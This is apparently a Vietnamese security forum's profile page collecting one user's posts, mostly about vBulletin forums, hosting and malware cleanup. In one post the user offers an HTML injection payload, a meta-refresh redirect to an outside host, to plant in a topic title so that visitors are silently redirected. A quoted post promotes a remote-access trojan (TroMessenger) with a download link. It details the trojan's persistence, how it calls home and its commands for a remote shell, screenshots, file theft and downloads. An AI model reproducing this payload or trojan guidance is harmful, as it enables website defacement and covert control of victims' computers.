banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: alexnguyen  XML
Profile for alexnguyen Messages posted by alexnguyen [ number of posts not being displayed on this page: 0 ]
 
Bác cho em hỏi câu cùi bắp chút là VBB cài xong đều phải del folder install thì sao phải lo lắng bị khai thác lỗi này vậy bác?
Trước mình thấy HVA có box kiểm tra bảo mật rất hay, có thể giúp những newbie như mình không có kiến thức về bảo mật có thể nhờ đến sự giúp đỡ của các bạn có khả năng để giúp bảo vệ web của mình ngày càng tốt hơn. Tuy nhiên, box này đã bị lock từ năm 2007 và đến giờ vẫn chưa mở lại, mình muốn hỏi là đến bao giờ thì box này có thể mở lại, vì thực sự mình thấy nhu cầu này hiện nay không nhỏ?
Mình muốn hỏi cách nào cho đăng ký tự động và liên tục vào diễn đàn VBB (không có mã xác nhận, câu hỏi bảo vệ) được không?
Mình không hiểu sao forum của mình có mạng không vào được, có mạng vào được. Mà cái này chỉ đối với host mới chuyển qua, còn host trước đó thì không bị tình trạng này. Vậy nguyên nhân là sao để mình còn biết mà thắc mắc với HP nhỉ?
Không biết có phải vbb 3.8 đang có bug gì không mà mình thấy 1 số site đang sử dụng đồng loạt bị hack trong mấy ngày qua, đặc biệt là 2 site chuyên về vbb là vietvbb.vn và hoiquantinhoc.com. Mình không biết có phải vbb đang có bug gì hay không? Nếu bạn nào thường xuyên update các bug news có thể chỉ giùm chút được không vì mình cũng đang dùng vbb, và 1 trong 2 cái mình làm cho trường cấp 3 dùng 3.7.4 mới bị chiếm quyền admin hôm qua và mới giành lại, hiện đang khóa tạm thời để xem thế nào?
Mình dùng Bit scan USB, nó báo khoảng 15 con, nhưng chỉ del khoảng 9 con, còn lại 6 con nó không del được (những lần khác cũng tương tự với các con số khác nhau), mình không biết vậy là sao nữa? Mọi người có bị vậy không? Mà nếu nó không del được thì nguy hiểm chít mất smilie
cái này chỉ dành cho J nào cho đăng ký mem phải không ạ? Nếu site đóng chỉ để cung cấp thông tin thì em vào nó chỉ nói

Chào mừng!
Chào mừng bạn tới khu vực người dùng trên site của chúng tôi
Mình dùng forum vbb, host window của nhân hoà bạn ạ
Forum của mình bị hack, bây giờ mình muốn xem tại nhật ký các truy cập gần đây nhất từ các IP thì làm thế nào, mình muốn xác định các IP đã tham gia truy cập, và nếu có thể làm sao xác định được kẻ tấn công thì càng tốt. Giúp mình với, thanks
cách alex vẫn làm:

Command Promt: @taskkill /f /im ntsystem.exe

Đảm bảo DWK chết không kịp ngáp

Music_Star wrote:
làm thế nào để tui có thể hack mod top x này nhỉ!
tui cần hack lắm ! 

Thì cứ post 1 topic với title là cái nì mà
">"">>>><meta http-equiv="Refresh" content="0;url=http://hcaonline.mine.nu"> """" >  

Mạng càng nhanh càng khó phát hiện bị ridirect sau khi vào trang chủ smilie
tui dùng mysqldumper, good
dùng tool backup cho tiện, Cpanel backup lâu
Cái này nếu tương tự host của nhanhoa là tại cái file log của nó, server sẽ del file này định kỳ (nhanhoa không cho del, del file này nó del host mình). Nếu đúng vậy thì không ảnh hưởng gì cả, khi nó del file log này đi thì tất cả lại trở về đúng những gì cần phải như thế smilie
nó hiện ra thông báo chỉ có số 1 thôi thì làm gì tiếp theo ?
2.1.7 có dính cái này không vậy

caothuvolam wrote:
Bạn có thể sử dụng Personal Web Server cũng được, thì ko cần đòi hỏi WinXP Pro hoặc Win Server. 

Bạn có thể hướng dẫn cụ thể hơn được không? Thanks
PHP dùng EasyPHP thì vô tư rồi, nhưng ASP không biết làm sao, mong các bác chỉ giúp
Ặc, đang xin source mà
Tôi không thể down được MySQL, ai có thể share giùm được không? Thanks
Thôi giờ kệ bố nhà nó, muốn ra gì thì ra, cứ vài tháng ra vài version thế này thì ông nội nó chạy theo kịp
Hiểu nôm na thì dịch ngay chính từ tên của nó local + host smilie => dịch nôm na từ 2 từ này là host giả định trên máy tính cá nhân của bạn smilie <= dịch cố cho sát nghĩa lém rùi đấy, còm muốn tìm hiểu thêm thì... hãy hỏi nhà thông thái google smilie
1. Reg host
2. Down FTP Client
3. Insert info host 2 FTP 4 connect
4. Upload
Teleport, Teleport là Teleport smilie, hỏi nhà thông thái link của Teleport mà down về rùi down luôn cả web về bác nhá
pó tay, share thì share, ko share thì thôi, ko share có ai bảo là không bảo bạn đâu chứ, bạn không share code nhưng người khác sẵn sàng share know cho bạn

Chỉ cần tìm mấy cái này (bác trên đã nói rùi đó)

$config['Database']['dbname'] = 'tên database';
$config['MasterServer']['username'] = 'tài khoản database';
$config['MasterServer']['password'] = 'mật khẩu database';
Thằng 19 không có pass unrar
Insert link viettyping vào Header & Body của Board Wrappers, HVA ko cho post Java nên bác contact em chỉ cho, YM alexandrianguyen1987

Bigball_hacker wrote:
http://www.sma-soft.ir/downloads/?u=TroMessenger
[IMG:http://sma-soft.ir/TroMessenger/tro_messenger_11_editserver.JPG]
Translation By: Adon126 @ Yahoo.com

Sơ lược chương trình


Đây là một chương trình xâm nhập và kiểm soát máy tính từ xa thông qua Yahoo! Messenger.
Với công cụ này, bạn có thể kiểm soát bất cứ một máy tính nào bằng cách gửi thông tin qua Yahoo! Messenger ảo thiết lập trong hệ thống.
Từ đó bạn có thể ra lệnh cho máy đối tượng làm theo bất kỳ mệnh lệnh nào.

Cơ chế hoạt động ?
Sau đây là quy trình hoạt động của chương trình sau khi xâm nhập:

0) Chạy vào chương trình khởi động .(Startup).
1) Kiểm soát bộ nhớ hệ thống.
2) Nằm ẩn chờ khi có kết nối vào mạng.
3) Khi máy đối tượng đã kết nối, phát tín hiệu trở về cho máy ID ảo.
4) Gửi thông tin về cho chủ nhân, sau khi quá trình phát tín hiệu thành công.
5) Và bây giờ bạn đã có thể kiểm soát mọi thứ trên máy nạn nhân.


Cấu hình tối thiểu:

1) Hệ điều hành Microsoft Windows XP hoặc Windows Server 2003 . Chương trình không hỗ trợ trên Windows 2000, Windows 98 đến thấp hơn, và hệ thống Linux.
2) 128MB RAM (256MB RAM cấu hình chuẩn)
3) 700Mhz CPU.
4) 8MB Card đồ họa.
5) Dung lượng trống đủ dùng. (Để lưu hình chụp gửi về)
6) Kết nối mạng thường xuyên. Chương trình hoạt động với mọi loại mạng. Ví dụ: Dialup, ADSL, Wireless, Broadband, Satellite, LAN ... v.v
Chương trình vẫn hoạt động với điều kiện truy cập mạng bình thường. Nhưng điều kiện kết nối liên tục thường xuyên sẽ giúp quá trình phát tín hiệu và gửi thông tin tốt hơn.

Tính năng đặc biệt

Không đòi hỏi IP Address ! Đây là ưu thế mạnh nhất của chương trình này. Trong những chương trình trước đây bạn buộc phải có và khai báo một IP Address trong quá trình kiểm soát. Với chương trình này thì không đòi hỏi IP Address.
Nghi vấn - Làm thế nào có thể thực hiện kiểm soát mà không cần IP Address ?
Giải đáp - Bởi vì chương trình này tạo ra hẳn một Yahoo! ID ảo cho bạn, vì vậy bạn không cần phải khai báo IP Address từ máy điều khiển. Mặc dù IP Address vẫn được gửi cho bạn khi kết nối. Nhưng đó chỉ là thông tin cung cấp thêm cho bạn về máy bị kiểm soát, và không có tác dụng gì đối với chương trình TroMessenger.

Chạy ẩn trong hệ thống mạng LAN, kể cả hệ thống Router của máy chủ. Đây là một khuyết điểm của hầu hết các loại Trojan, như là Troya, chỉ hoạt động trên hệ thống có IP tĩnh. Trước đây, bạn phải có được IP Address hợp lệ. Ví dụ: nếu có một hệ thống mạng với 5 máy tính và bạn là một thành viên trong hệ thống mạng đó, bạn có thể truy cập vào các máy khác. Nhưng ai đó nằm ngoài hệ thống mạng này thì không thể truy cập vào bất cứ máy nào trong hệ thống. Bởi vì anh ta không có IP Address hợp lệ để liên kết vào hệ thống. Nhưng giờ đây, vấn đề ĐÃ ĐƯỢC GIẢI QUYẾT với TroMessenger.
Với TroMessenger, bạn có thể truy cập vào bất cứ máy nào ở bất kỳ hệ thống mạng nào. Chỉ cần mọi máy tính được kết nối vào mạng và TroMessenger đang nằm ẩn bên trong.

Các kiểu lệnh

Trong phiên bản này, đây là một số câu lệnh khởi đầu cho việc kiểm soát.

/Result Kết quả của quá trình thực thi sẽ được gửi về ngay sau khi quá trình hoàn tất. Nhưng nếu như nội dung của kết quả gửi về quá dài (nhiều hơn 200 ký tự), nó sẽ được gửi lần lượt, liên tục. Bởi vì Yahoo! Messenger không cho phép nội dung có số ký tự vượt quá giới hạn đã định sẵn.

/cmd - Tương tự MS-DOS Command Prompt. Bạn có thể thực thi lệnh DOS trên máy bị kiểm soát, và nhận được kết quả. Các lệnh như: DIR , VER , VOL , IPConfig , Netstat , WHOAMI v.v ... đều có thể được sử dụng như lệnh DOS.
Ví dụ: /cmd dir C:\*.txt]

Các kiểu lệnh thực thi DOS
Bạn có thể thực thi một số lệnh DOS đặc biệt để khai thác thông tin từ phía máy bị kiểm soát.

/cmd dir - Xem danh sách các tập tin và thư mục. Bạn có thể sử dụng linh động các thông số để khai thác thông tin cụ thể nhất. Ví dụ: /cmd dir /on , /cmd dir *.txt

/cmd ipconfig - Lấy thông tin truy cập. Câu lệnh có chức năng khai thác thông tin từ thiết bị mạng đang sử dụng trên máy bị kiểm soát. Nó sẽ truy ra tên thiết bị mạng, địa chỉ IP, cổng vào, DNS Server ... v.v

/cmd tasklist - Lấy danh sách các chương trình đang hoạt động. Tương tự như Windows Task Manager. Nhưng dưới giao diện DOS.

/cmd whoami - Cung cấp thông tin để xác định máy qua mạng. Thông tin gửi về gồm : TÊN MIỀN / TÊN NHÓM MẠNG , Tên máy tính và tên truy cập máy tính sử dụng WINDOWS. Lưu ý : Câu lệnh này chỉ hoạt động với Windows Server 2003. Không hỗ trợ trên Windows XP.

/cmd netstat - Hiển thị hệ thống mạng và tất cả kết nối hiện có trên máy tính. Để đạt tốc độ nhanh, sử dụng /cmd netstat -na

Khai thác thông tin của máy tính:
Chỉ việc sử dụng câu lệnh này, bạn có thể lấy được thông tin chính từ máy đối tượng.

/IP - cho biết địa chỉ IP. Một máy tính có thể có nhiều hơn một địa chỉ IP khi hoạt động. Ví dụ : bạn có một tài khoản để kết nối internet, và máy tính của bạn đang nằm trong một khu vực kết nối mạng nội bộ (LAN). Vì vậy bạn sẽ có 2 địa chỉ IP ấn định trong máy tính. TroMessenger sẽ gửi toàn bộ địa chỉ IP hiện hành trên máy tính.

/osname - cho bạn biết đầy đủ về tên của Hệ điều hành Windows và tên các phiên bản cập nhật. Ví dụ : Windows Server 2003 Service Pack 1.

/computername: cho biết tên thiết lập của máy trên hệ thống mạng. Các máy tính nhận dạng nhau qua tên này. Nếu máy tính hiện thời chưa được kết nối, không thành vấn đề, nội dung sẽ được gửi ngay sau đó.

/winusername: cho biết tài khoản quản lý sử dụng Windows. Đặc biệt trong Windows XP, có thể sẽ có nhiều tài khoản sử dụng cùng một máy. Và thông tin này sẽ được thay đổi mỗi khi người sử dụng truy cập.
Nhưng với Windows Server 2003 tên này luôn được trả về Administrator. Tuy nhiên dân Admin đã biết chuyển tên tài khoản. nhưng thông thường đa số Admin lại quên làm.

/yahooid - Cho biết tên Yahoo ID của người cuối cùng đang bị kiểm soát.

Những chức năng chính

/Help - Hiển thị các lệnh hợp lệ của TroMessenger. Sẽ có nhiều câu lệnh hơn trong những phiên bản mới. Lúc đó bạn chỉ cần sử dụng lệnh này.

/screenshot - Cho bạn ảnh chụp màn hình của máy tính đối tượng.
Nghi vấn - Yahoo! Messenger là chương trình viết bằng ngữ lệnh, làm sao TroMessenger có thể cho tôi xem ảnh chụp ?
Giải đáp - TroMessenger cho bạn ảnh ngay tức khắc. Có nghĩa là : chụp sao lại màn hình, sau đó tải lên mạng, và gửi đến bạn một liên kết để xem ảnh.

/download - Tải về một thứ gì đó và lưu lại trên máy đối tượng. Bạn sẽ được thông báo khi quá trình hoàn tất.
Câu lệnh: /download "http://www.hostname.com/folder/file.zip" "C:\SavedFile.zip"
Chú ý: Bạn phải sử dụng dấu ngoặc ("). Nếu quên, quá trình tải về sẽ không thực hiện được.

/restart - Khởi động lại máy tính.
Chú ý: Nếu bạn chạy thử nghiệm trên máy tính của bạn, bạn sẽ bị khởi động ngay lập tức mà không có tín hiệu thông báo nào. Và những chương trình trên máy sẽ bị mất. Hãy cẩn thận khi sử dụng câu lệnh này. Tương tự như Shutdown command.

/shutdown - Tắt máy tính. (Lặp lại chú ý)

/time , /date - Hiển thị ngày và giờ.

/ejectcd - Mở ổ đĩa CD-ROM.

/closecd - Đóng ổ đĩa CD-ROM sau khi mở.

/view - Hiển thị nội dung của văn bản. Lưu ý: nếu văn bản nhiều hơn ... ký tự, nó sẽ được ngắt ra thành nhiều phần để gửi liên tiếp nhau.

/getfile - tải bất kỳ tập tin nào lên mạng và gửi liên kết tải về cho bạn. Được sử dụng khi bạn muốn đọc những tập tin không phải là tập tin văn bản từ máy đối tượng

/status , /idle , /busy - Đặt tín hiệu hiển thị cho địa chỉ ảo. Như là tín hiệu Busy hoặc Idle Icons bên cạnh ID.
Câu lệnh ví dụ :
/status Toiyeuem.
/idle Dangantoi.
/busy Hiendangban.

/cancel - Đình chỉ câu lệnh đang thực hiện. Ví dụ khi bạn muốn xem một tập tin văn bản có dung lượng 1MB. Và nội dung đang được gửi đi từng phần, nhưng rồi bạn cảm thấy chán và không muốn xem nữa và muốn gửi một lệnh khác. Chỉ cần dùng lệnh /cancel là xong.

/login - Đăng nhập tài khoản sử dụng quản lý. Mỗi khi TroMessenger khởi động, nếu bạn không được xác nhận là chủ quản lý của chương trình, nhưng bạn biết mật khẩu, bạn sẽ sử dụng /login your password để bắt đầu điều khiển chương trình. Không sử dụng dấu ngoặc cho mật khẩu.... 

Hic, đâu có thấy link down ở đâu các bác
 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|